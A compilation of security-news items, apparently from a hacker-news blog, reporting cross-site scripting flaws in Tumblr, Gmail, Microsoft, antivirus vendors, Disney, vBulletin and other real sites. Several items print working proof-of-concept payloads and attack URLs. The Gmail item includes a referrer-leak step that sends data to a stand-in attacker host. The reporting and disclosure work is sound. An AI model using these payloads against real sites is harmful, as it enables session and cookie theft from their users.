A Security researcher, Riyaz Ahemed Walikar, has posted evidence of a serious persistent Cross Site Scripting(XSS) vulnerability on Tumblr, the popular microblogging platform.
XSS flaws are highly common on websites these days, but most of them are non-persistent and implicitly less dangerous.
"XSS can cause a lot of serious problems. An attacker can steal cookies, redirect users to fake or malicious sites, control a user's browser using automated frameworks like BeEF and download and execute exploits on the victim's computer," Researcher said in the blog post.
"Stored XSS is even more dangerous since the script is stored on the server and is executed everytime user visits an infected page."
Researcher found vulnerability on the 'Register Application' page at http://www.tumblr.com/oauth/apps. The application was not sanitizing user input when a user would create a new application. An XSS attack vector like tester "><img src='x' onerror="alert(document.cookie)"/> would trigger an alert box, displaying the user's cookie, in the browser.
Tumblr were notified more than three weeks ago on the issue. Finally, they fixed the vulnerability Today(july 14).
If you don't know what XSS is, you can read this article "Xss For Beginners".
A security Researcher , Gambit, has discovered Cross site scripting vulnerability in Microsoft official website.
He found the vulnerability last month and reported the vulnerabilities to the Microsoft.
"Well last month I was looking around on MSN.com and Microsoft.com I found two XSS vulnerabilities, one in each domain. I reported the vulnerabilities to the Microsoft security team and secured a spot on their acknowledgments page."Gambit said in his blog.
Microsoft listed his name in the 'Security Researcher Acknowledgments for Microsoft Online Services' page.
'asia.perf.glbdns.microsoft.com' page is vulnerable to XSS. Researcher managed to execute the XSS code in the page.
POC: "asia.perf.glbdns.microsoft.com/files/top.php?domain=<script>alert(/Gambit/)</script>"
He found the vulnerability last month and reported the vulnerabilities to the Microsoft.
"Well last month I was looking around on MSN.com and Microsoft.com I found two XSS vulnerabilities, one in each domain. I reported the vulnerabilities to the Microsoft security team and secured a spot on their acknowledgments page."Gambit said in his blog.
Microsoft listed his name in the 'Security Researcher Acknowledgments for Microsoft Online Services' page.
'asia.perf.glbdns.microsoft.com' page is vulnerable to XSS. Researcher managed to execute the XSS code in the page.
POC: "asia.perf.glbdns.microsoft.com/files/top.php?domain=<script>alert(/Gambit/)</script>"
A security Researcher Nils Junemann discovered persistent cross-site scripting (XSS) vulnerabilities in Gmail and notified Google before few moths, Google patched the vulnerabilities now.
According to his blog post, Junemann found three different XSS vulnerabilities in Gmail. The first security flaw is "Persistent DOM XSS (innerHTML) in Gmail's mobile view" :
A incoming mail containing <img src=x onerror=prompt(1)> within the subject and forwarded to another user, has lead to XSS.
The second one is very simple non-persistent XSS in Gmail's mobile view:
https://mail.google.com/mail/ mu/#cv/search/%22%3E%3Cimg% 20src%3Dx%20onerror%3Dalert(2) %3E/foobar
The third security issue is very intersting persistent XSS. He discovered that there was a way for an attacker to get access to several key pieces of information in the URLs that Gmail generates when it displays a message to a user.
When a message is displayed directly, rather than as part of a user's inbox, it contains both a static user ID and an identifier for the individual message. Those values shouldn't be available to an attacker, but Juenemann found that he could get them through referrer leaks.
"An attacker doesn't know the ik and the message id . Without both values it's not possible to generate the special URL. But it's easy to get both values through referer leaking.
We have to send to our victim a HTML e-mail with that content:
<img src=" https://attackershost.com/1x1.gif " >When the user opens the email message, the GIF image will send the user ID and message ID to theattacker's server. The second URL also will leak that data if the user clicks on it. The script will then display a Javascript alert, and that's the attacker's code runningin the context of Gmail.
<a href=" https://attackershost.com/gmailxss ">Click here to have fun</a>
<script>alert(/xss/)</script>
A Security Researcher Ankit Sharma has discovered Cross Site scripting vulnerability in four Antivirus websites.
The official websites belong to BitDefender , AVG, Avira and Total Defense Antivirus are vulnerable to xss.
In BitDefender TrafficLight , the URL input is not filtering the XSS. The Url input allows hackers to run malicious xss code. It can results in phishing attacks.
POC:
http://trafficlight.bitdefender.com/info?url=%27;alert%28String.fromCharCode%2888,83,83,32,32,66,89,32,32,65,78,75,73,84%20%29%29//\%27;alert%28String.fromCharCode%2888,83,83,32,32,66,89,32,32,65,78,75,73,84%20%29%29//%22;alert%28String.fromCharCode%2888,83,83,32,32,66,89,32,32,65,78,75,73,84%20%29%29//\%22;alert%28String.fromCharCode%2888,83,83,32,32,66,89,32,32,65,78,75,73,84%20%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83,32,32,66,89,32,32,65,78,75,73,84%20%29%29%3C/SCRIPT%3E
Indian hacker Akshay discovered XSS vulnerability in more than 100 websites and listed the POC in tinypaste.
The vulnerable sites includes IndiaTimes,wikia.com, seagate, placementindia. After analyzing the paste, most of the sites are subdomain of wikia website.
Some other sites that are vulnerable to xss attack are dialabook.in, junglee.com, antya.com,t3.com,independent.co.uk
In past, he found xss vulnerability in lot of high profile sites.
http://pastebin.com/tLXTZDvP
The vulnerable sites includes IndiaTimes,wikia.com, seagate, placementindia. After analyzing the paste, most of the sites are subdomain of wikia website.
Some other sites that are vulnerable to xss attack are dialabook.in, junglee.com, antya.com,t3.com,independent.co.uk
In past, he found xss vulnerability in lot of high profile sites.
http://pastebin.com/tLXTZDvP
A hacker call himself as "5p1K3 BO7" found Cross site scripting vulnerability in some high profile sites. The list of vulnerable sites includes Airtel, Ebay, Jusdial ,rediff and NavBharatTimes .
Also he found xss vulnerability in the following sites: rovio.com ,moneycontrol.com,In.Com,Reliance site,m.mytatasky.com ,dinaralert.webs.com and domestichotels.yatra.com.
The list of vulnerable sites with screenshot:
http://www.ipchecking.com - snap - http://4.bp.blogspot.com/-sXxLSZjS-YA/T3r6jzFEJxI/AAAAAAAAAQU/9KO2PSZjVNA/s640/ipchecking.PNG
2.http://www.hostip.info/ - snap - http://2.bp.blogspot.com/-1frOtWxbyWQ/T3rm4InsqxI/AAAAAAAAAQM/CC2oPWpAwUA/s640/host.PNG
3.http://buzzr.in/ - snap - http://4.bp.blogspot.com/-RrW1-tkGoYI/T3me0_BFAuI/AAAAAAAAAP0/-BPrIYpJNd0/s640/buzzer.in.PNG
4.http://www.jabong.com/ - snap - http://2.bp.blogspot.com/-h-NRz0x9r8U/T3meRO0ttjI/AAAAAAAAAPs/lsfHV7E6hFQ/s640/jabong.PNG
5.http://www.infibeam.com/ - snap - http://1.bp.blogspot.com/-XzpThsTvM1o/T3mc184ZwBI/AAAAAAAAAPc/lDcc4ICW8Z0/s640/infi.PNG
6.http://govasool.com/ - snap - http://4.bp.blogspot.com/-IhPt_piUZNE/T3mcGznGWFI/AAAAAAAAAPU/_cUNqu51qJI/s640/govasool.PNG
7.http://www.bestpricebid.com/ - snap - http://4.bp.blogspot.com/-sRLF50gx5qo/T3mbjos3_WI/AAAAAAAAAPM/eRCuvlO_hSc/s640/bestpricebid.PNG
8.discovery.com by - snap - http://3.bp.blogspot.com/-LuPNagueW-4/T3hUApqubkI/AAAAAAAAAOs/B13FADXhFv8/s640/Capture.PNG
9.pocketgamer.co.uk - snap - http://4.bp.blogspot.com/--7LLdA1-QeU/T3hNmJ4sPFI/AAAAAAAAAOg/NRqr8fgUwsE/s640/povket+gamer.PNG
10.zdnet.com - snap -http://4.bp.blogspot.com/-L2EztX0qh7w/T3g3DlxXMtI/AAAAAAAAAOM/qMaWRUmF0zY/s640/zdnet.PNG
patched
11.1up.com - snap - http://imgur.com/uc5y3
12.astrologer.rediff.com - snap - http://i49.tinypic.com/2q8pzqa.png
13.LIC - http://i45.tinypic.com/hx3ek3.png
14.http://warebuzz.com - http://1.bp.blogspot.com/-0rrctaNpS1g/T3gKU52H9sI/AAAAAAAAAN0/NgEEHOy1JJo/s640/ware+buzz.PNG
15.http://www.thedownloadplanet.com - http://2.bp.blogspot.com/-A90-Cs4O2Ow/T3gJY0PwYTI/AAAAAAAAANs/X3YRb8l_-8E/s640/download+planet.PNG
16.http://md5-decrypter.com - http://1.bp.blogspot.com/-wYTXo9rjxdI/T3brfaNUrdI/AAAAAAAAANc/aHu9oAVN4uo/s640/md5-decrypter.PNG
17.http://www.shiksha.com - http://3.bp.blogspot.com/-DE8esm6LDi0/T3bhpjsEExI/AAAAAAAAANU/ooJCO2CIur8/s640/shiksha.PNG
18.http://www.scholastic.com - http://1.bp.blogspot.com/-sFeKT9dyi5A/T3W-JAsfTII/AAAAAAAAANM/zLYTpg_zAZ4/s640/scholastic.PNG
19.http://www.indiatrace.com - http://4.bp.blogspot.com/-Pdkg39UIVLQ/T3W1bF-LK7I/AAAAAAAAANE/O1Lp-3oEndA/s640/Capture.PNG
20.http://www.americanregistry.com - http://1.bp.blogspot.com/-hs2fIRZsgAI/T3VpB4S9wnI/AAAAAAAAAMs/E0lBuFawamc/s640/american.PNG
21.http://www.stockpricetoday.com - http://4.bp.blogspot.com/-drwR5vn2yuY/T3VoHExfzEI/AAAAAAAAAMk/6NRzeUEHMGY/s640/stock+price.PNG
22.http://www.trdefence.com - http://4.bp.blogspot.com/-DDNU3wRnS-k/T3VmNQAmvwI/AAAAAAAAAMc/Pa1-0gAKWa4/s640/turkey+defense.PNG
23.http://industry.net/ - http://1.bp.blogspot.com/-jz5Qprco2l8/T3ViZ8auwDI/AAAAAAAAAMM/fbSHyu34DyM/s640/industry.net.PNG
24.http://www.bdtradeinfo.com - http://4.bp.blogspot.com/-ssrm58lR7Y0/T3SGg5pyVxI/AAAAAAAAALk/PSQdV4_9YQE/s640/bdtradeinfo.PNG
25.dealsandyou.com - http://1.bp.blogspot.com/-PmgIo4Inb8g/T3MTmGEheBI/AAAAAAAAALM/HwKAWSXRMAg/s640/deals+and+you.PNG
26.100bestbuy.com - http://2.bp.blogspot.com/-VpZiQkWQH2Y/T3MSwjfKElI/AAAAAAAAALE/y30pSYfrwrQ/s640/100+best+buy.PNG
27.chennai.burrp.com - http://4.bp.blogspot.com/-YRKuTsUhN6U/T3LrzpQZ2jI/AAAAAAAAAKg/5Gi2Ww225J4/s640/burrp+2.PNG
28.bangalore.burrp.com - http://2.bp.blogspot.com/-Wo3a1kI29ZI/T3LqgRre7jI/AAAAAAAAAKY/V0QsT2s60I4/s640/burp+banglore.PNG
29.http://www.proxysites.com - http://3.bp.blogspot.com/-yiJQdIQI8nw/T3Lp-Drl-KI/AAAAAAAAAKQ/-QzKBTpXAp4/s640/proxy+site.PNG
30.http://vertor.com - http://3.bp.blogspot.com/-AGl5bbo-d3M/T3HhwS0GX2I/AAAAAAAAAKI/OvrpwMYYlMQ/s640/vertor.PNG
31.https://torrentprivacy.com - http://2.bp.blogspot.com/-Ksa-FQtAiXg/T3HgB10v5_I/AAAAAAAAAKA/4RBWC1tYO-k/s640/privacy.PNG
32.www.yifytorrents.com - http://2.bp.blogspot.com/-KPCn5bldif8/T3HWLfWyUPI/AAAAAAAAAJw/2zDLbbttZAY/s640/yify.PNG
33.saavn.com - http://4.bp.blogspot.com/-N1Yvg1yR4BU/T3HI_zKr9zI/AAAAAAAAAJg/IJgRFT2wMHw/s640/saa.PNG
34.www.arabianbusiness.com - http://2.bp.blogspot.com/-ngUEyIWkd7Q/T3GvlQ0sjmI/AAAAAAAAAJY/ZrLBull5om8/s640/arabian.PNG
35.velocity.discovery.com - http://4.bp.blogspot.com/-3vFAtzIfnoA/T3GqX6mj0II/AAAAAAAAAJQ/AXLIAQ6ss_c/s640/velocity.PNG
36.science.discovery.com - http://1.bp.blogspot.com/-ygi6RWwm4r8/T3GqI1LSJyI/AAAAAAAAAJI/A_NvDMps6nw/s640/science.+disco.PNG
37.planetgreen.discovery.com - http://1.bp.blogspot.com/-CuI8fyW1JGQ/T3Gp335-xtI/AAAAAAAAAJA/rKMVzco1IBM/s640/planet+green.PNG
38.investigation.discovery.com - http://4.bp.blogspot.com/-qnWsvSYY8YQ/T3GpdqVeU-I/AAAAAAAAAI4/_9QxkpUTLho/s640/investigation+disco.PNG
39.health.discovery.com - http://4.bp.blogspot.com/-p0wnXa1elEA/T3GpB0aBk7I/AAAAAAAAAIw/a9ZhyEQu4Yc/s640/health+disco.PNG
40.animal.discovery.com - http://4.bp.blogspot.com/-1Hzcu--hP_s/T3GosmdYnvI/AAAAAAAAAIo/Z3KmcFmyw4Y/s640/animal+planet.PNG
41.brothersoft.com - http://4.bp.blogspot.com/-M9esX8gICt0/T3GbKJ-z5kI/AAAAAAAAAIY/DMm0KQEVJwI/s640/brother+soft.PNG
42.http://www.emp3world.com - http://1.bp.blogspot.com/-V8S_UBtNMbw/T3GO2V0qTHI/AAAAAAAAAIM/k-1CIzVcOps/s640/emp3.PNG
43.www.malabargold.com - http://1.bp.blogspot.com/-dMap3sAvV5o/T3B8aHgBKdI/AAAAAAAAAHw/7IzjV4PL144/s640/malabar.PNG
44.www.tanishq.com - http://3.bp.blogspot.com/-EDfBzzJz8iQ/T3B7_16FClI/AAAAAAAAAHo/7W3OBxylZd4/s640/tanishq.PNG
45.http://www.ecb.co.uk - http://3.bp.blogspot.com/-ouWqcIl-6as/T3BwabPqpjI/AAAAAAAAAHg/GDSXL9brJ4c/s640/british.PNG
46.http://www.premierleague.com - http://4.bp.blogspot.com/-7bPcLU0GHw4/T3BrJKI_FLI/AAAAAAAAAHQ/VWVYLw0Nmj0/s640/premier.PNG
47.http://www.cricket.com.au - http://1.bp.blogspot.com/-YmGHDgXCq3M/T3BuAVdhJ5I/AAAAAAAAAHY/kX1_YFZ4VCU/s640/kabarroo.PNG
48.http://www.rapidsharedata.com - http://2.bp.blogspot.com/-mJPoTJVcMic/T3Boa6CFxKI/AAAAAAAAAHI/uPfCqNLo8Qk/s640/rapidshare.PNG
49.www.whatsmyip.com - http://2.bp.blogspot.com/-GzjF_oq33w4/T3A1jMzlRVI/AAAAAAAAAGY/50ntkVG3xos/s640/whatsmy+ip.PNG
50.http://eztv.it - http://4.bp.blogspot.com/-JgMf3qZ9kRo/T27Gi34a61I/AAAAAAAAAFo/9JyXqalNmEM/s640/eztv.PNG
51.http://www.indiaplaza.com - http://2.bp.blogspot.com/-K6izMAgd_ik/T3AcfP2oDpI/AAAAAAAAAGA/yDY-RE8kGW8/s640/india+plaza.PNG
52.asiagamespot.com - http://1.bp.blogspot.com/-cToR0vSQ09Q/T29DkeFu6_I/AAAAAAAAAF4/OLUP0y-jUms/s640/gamespot.PNG
53.http://dunyanews.tv - http://1.bp.blogspot.com/-OouHLv17uwU/T262ogNVDZI/AAAAAAAAAFg/FkVc83KjMp0/s640/pk+news.PNG
54.http://thetwilightsaga.com - http://1.bp.blogspot.com/-5xQCtPSXvQs/T230n1BvqPI/AAAAAAAAAFY/DykhfJN-03I/s640/twilight.PNG
55.https://secure.wsj-asia.com - http://1.bp.blogspot.com/-YfbSmQUp4VQ/T23gKloKEKI/AAAAAAAAAFQ/K-hecZghSEU/s640/wallstreet.PNG
56.expedia.co.in - http://1.bp.blogspot.com/-FIyU9Zz7ik4/T23TB3x7NzI/AAAAAAAAAE8/1l5awVK2HjQ/s640/expedia.PNG
57.http://www.indiainfoline.com - http://2.bp.blogspot.com/-dnZtvmIk44M/T23Qykr8zVI/AAAAAAAAAE0/HuQM6Q1ULfY/s640/iifl.PNG
58.http://www.palestinechronicle.com - http://3.bp.blogspot.com/-iJjcuBwsbqs/T22dno4ma7I/AAAAAAAAAEM/zKOReV8JlQY/s640/Caapture.PNG
59.http://thesims2.ea.com - http://4.bp.blogspot.com/-qPQRpgXJLsI/T2yoEKsYiGI/AAAAAAAAAD4/QQRoOHrs8Ek/s640/C+apture.PNG
60.olx.in - http://3.bp.blogspot.com/-fpt0DzwwZKA/T22-M-6T2nI/AAAAAAAAAEk/PQkFW91TsO4/s640/olx.PNG
Akshay AKA 0z0n3 claimed that he have discovered a Persistent XSS vulnerability in blogspot.com. He managed to inject the xss vector in his own blogger dashboard. He is sure it is not template page(usually templates allow bloggers to inject scripts ).
He used one of the following xss vector:
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
After injecting, he didn't get a pop-up but after some minutes he started getting pop-ups. He reported about the vulnerability to Google Security team. The vulnerability is not rewarded by Google.
"Thank you for your note. We took a look at the XSS issue you reported. Unfortunatley, the XSS issues is executing on the blogspot domain and not blogger.com. We come some of these scenarios here.
http://www.google.com/about/company/rewardprogram.html#javascript-blogger
Unfortunately, XSS issues on blogspot(as opposed to blogger.com) do not quailfy for the VRP. If you manage to execute this javascript on someone else's blog or on the blogger.com domain, that would qualify for a reward." Google response mail.
GreyHat Hackers Sony and Flexxpoint come with interesting xss found, discovered cross site scripting vulnerability in Odnoklassniki. Odnoklassniki (Одноклассники in Russian, Classmates) is a social network service for classmates and old friends reunion popular in Russia and other former Soviet Republics. It was created by Albert Popkov on March 4, 2006.
He provided the vulnerable link and video to demonstrate the vulnerability:
In order to verify the vulnerability, we have to login because the page is available only for logged in users.
POC video:
He provided the vulnerable link and video to demonstrate the vulnerability:
http://www.odnoklassniki.ru/dk?st.cmd=appSearchResultList&st.isEmpty=off&st.query=%22%22%3E%3Cscript%3Ealert%28%22Odnoklassniki.ru%20Cross%20Site%20Scripting%22%29%3C/script%3E%3Ciframe%20src=%22http://xssed.com%22%3E
 |
| Screenshot |
POC video:
Grey Hat hacker "Sony" has discovered Cross site scripting(XSS) vulnerability in Radikal.ru. Radikal.ru is one of Russia's largest image hosting service that allows you to quickly publish photos on the various chat rooms, message boards, blogs and online forums.
He found XSS vulnerability in multiple pages.
Here is one of the vulnerable link:
In order to see other vulnerability, you have to login into the website. The vulnerability resides in Edit pics,etc.
He found XSS vulnerability in multiple pages.
Here is one of the vulnerable link:
http://www.radikal.ru/GALLERY/PageGallery.aspx?pg=258&period=022008%22%22%3E%3Cscript%3Ealert%28%22Radikal.ru%20Cross%20Site%20Scripting%22%29%3C/script%3E&id_gallery=-1
 |
| Screenshot |
In order to see other vulnerability, you have to login into the website. The vulnerability resides in Edit pics,etc.
Security Researcher, Fabian Cuchietti discovered XSS vulnerability in the Amazon Web Services(aws.amazon.com).
It seems that the vulnerability has been fixed by vendor, the admin managed to filter html codes by converting to html special characters. Anyway we are able to retrieve the mirror of the vulnerability from XSSed.com.
Mirror is available here:
http://www.xssed.com/mirror/77551/
POC:
https://aws.amazon.com/amis?ami_provider_id=4&architecture='%22--%3E%3C/style%3E%3C/script%3E%3Cscri
pt%3Ealert(0x015E00)%3C/script%3E&selection=ami_provider_id%2Barchitecture
It seems that the vulnerability has been fixed by vendor, the admin managed to filter html codes by converting to html special characters. Anyway we are able to retrieve the mirror of the vulnerability from XSSed.com.
Mirror is available here:
http://www.xssed.com/mirror/77551/
 |
| Screenshot of the vulnerability |
A Hacker group TeamHav0k reformed and made a new group called "TeamDigi7al". The Hacker group become active now and exposed vulnerabilities in some high profile sites.
Hackers exposed the XSS vulnerabilities in NASA(careerlaunch.jpl.nasa.gov) , Vatican.va and weather.com. Hackers found SQL injection vulnerability in LoC(webarchive.loc.gov) and LFI vulnerability in Humboldt State University (humboldt.edu).
Hackers also hacked and dumped the Bolivian Ambassadors inbox. They upload a 62MB sized RAR file(Emails.rar) in uppit.com.
A Hacker calling himself "Silent Hacker" discovered XSS vulnerability in Disney websites. The Disney.in website is found to be vulnerable to Cross site scripting.
POC:
http://www.disney.in/DisneyOnline/j/redirect.jsp?redirectURL=%22%3E%3Cscript%3Ealert%28%22XssEd%20By%20SilenT%20HaXoR%22%29%3C/script%3E
Grey Hat hacker "Sony" has discovered Cross Site Scripting vulnerability in Nimbuzz Messenger. According to his report, the Nimbuzz version 2.2.0 is vulnerable to XSS.
Hacker found vulnerability in the Chat Window-->View in Browser. (persistent code). The 'forget password' page is found to be vulnerable to XSS.
Vulnerable Link:
http://www.nimbuzz.com/webchat_login?lang=en&step=2&login=error
Poc:
http://www.nimbuzz.com/webchat_login?lang=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
Screenshot:
"ITWorlds, how does it feel to give advice in staying Secure from hackers but you're not secure yourself" Hackers said in Twitter.
The GreyHat hacker 'Zer0Pwn ' has discovered Cross site scripting as well as Sql injection vulnerability in the Yale University website. We are not providing the SQL injection vulnerable link for security issue.
The POC for xss vulnerability:
http://bioinfo.mbb.yale.edu/genome/worm/search.cgi?orf=B0244.9%3Cscript%3Ealert%28%22Zer0Pwn%22%29%3C/script%3E
Silent Hacker has discovered Cross site scripting vulnerability in KitKat official site,one of the famous Chocolate Manufacturers. Hacker find XSS in 'region' field in the map page.
POC:
http://www.kitkat.com/country.html?region="><script>alert("Hacked+by+Silent+Hacker+from+ICL")</script>
Security Researcher's "Matías Lonigro & Fabián Cuchietti" has discovered Self-XSS vulnerability Google Translator page. The vulnerability has been found in the 'translating a Document' option.
Google Translate provides an easy way to translate whole documents, without the need for copying and pasting large blocks of text. Simply click the translate a document link and submit your file as a PDF, TXT, DOC, PPT, XLS or RTF.
The uploader allows HTML files also. Unfortunately, it does not filter the HTML tags. It results in executing the HTML code as well as javascript code. Uploading HTML file embedded with javascript executes the script.
Researcher also provide a POC video:
Even Though this is self-XSS vulnerability, we can not simply ignore it. Hope , google will fix this issue as soon as possible.
Google Translate provides an easy way to translate whole documents, without the need for copying and pasting large blocks of text. Simply click the translate a document link and submit your file as a PDF, TXT, DOC, PPT, XLS or RTF.
The uploader allows HTML files also. Unfortunately, it does not filter the HTML tags. It results in executing the HTML code as well as javascript code. Uploading HTML file embedded with javascript executes the script.
Researcher also provide a POC video:
Even Though this is self-XSS vulnerability, we can not simply ignore it. Hope , google will fix this issue as soon as possible.
GreyHat hackers Sony and Flexxpoint has discovered Reflected and Persistent XSS Vulnerability found in Vbulletin forum software, one of the famous and most powerful forum software. Hacker claimed that he found xss vulnerability in VBulletin 3.8.x - 4.1.11 .
Hacker have discovered XSS vulnerability in lot of places including '/forum/blog.php' ,'forum/group.php' pages in Vbulletin official websites.
Also hackers found persistent XSS vulnerability in chinclub.ru. They tested this vulnerability in other forums also.They tested this vulnerability in Demo vBulletin Forum. Version 4.1.10.(https://www.vbulletin.com/admindemo.php). Hacker said It's Work in other version too.
Hacker also provide us a simple POC video:
Also Another Hacker ".eof" discovered and published a POC for the xss vulnerability in vbulletin board lastmonth.
Hacker have discovered XSS vulnerability in lot of places including '/forum/blog.php' ,'forum/group.php' pages in Vbulletin official websites.
Also hackers found persistent XSS vulnerability in chinclub.ru. They tested this vulnerability in other forums also.They tested this vulnerability in Demo vBulletin Forum. Version 4.1.10.(https://www.vbulletin.com/admindemo.php). Hacker said It's Work in other version too.
Hacker also provide us a simple POC video:
Also Another Hacker ".eof" discovered and published a POC for the xss vulnerability in vbulletin board lastmonth.
GreyHat hackers Sony and Flexxpoint , come with an interesting XSS finding in Invision Power Board. He is not sure which version of the IP Board is vulnerable but he sure it is between 3.1.x to 3.2.x.
Lot of websites are usings IP Board for their support forum. The forum for PCWorld, GovernmentSecurity.org, Webmoney.ru, Dr.web affected by this vulnerability.
The New-other Recipients fields in compose form of the Personal Messenger page is found to be vulnerable to XSS attack. Inserting xss code in New-other Recipients and pressing send/preview button, executes the script.
The XSS Vulnerability in IP Board version 3.2.3 used in Dr.Web was fixed before itslef but still exist in dr.Web's forum because they just used a un-patched software at the moment of writing on this post.
Lot of websites are usings IP Board for their support forum. The forum for PCWorld, GovernmentSecurity.org, Webmoney.ru, Dr.web affected by this vulnerability.
The XSS Vulnerability in IP Board version 3.2.3 used in Dr.Web was fixed before itslef but still exist in dr.Web's forum because they just used a un-patched software at the moment of writing on this post.
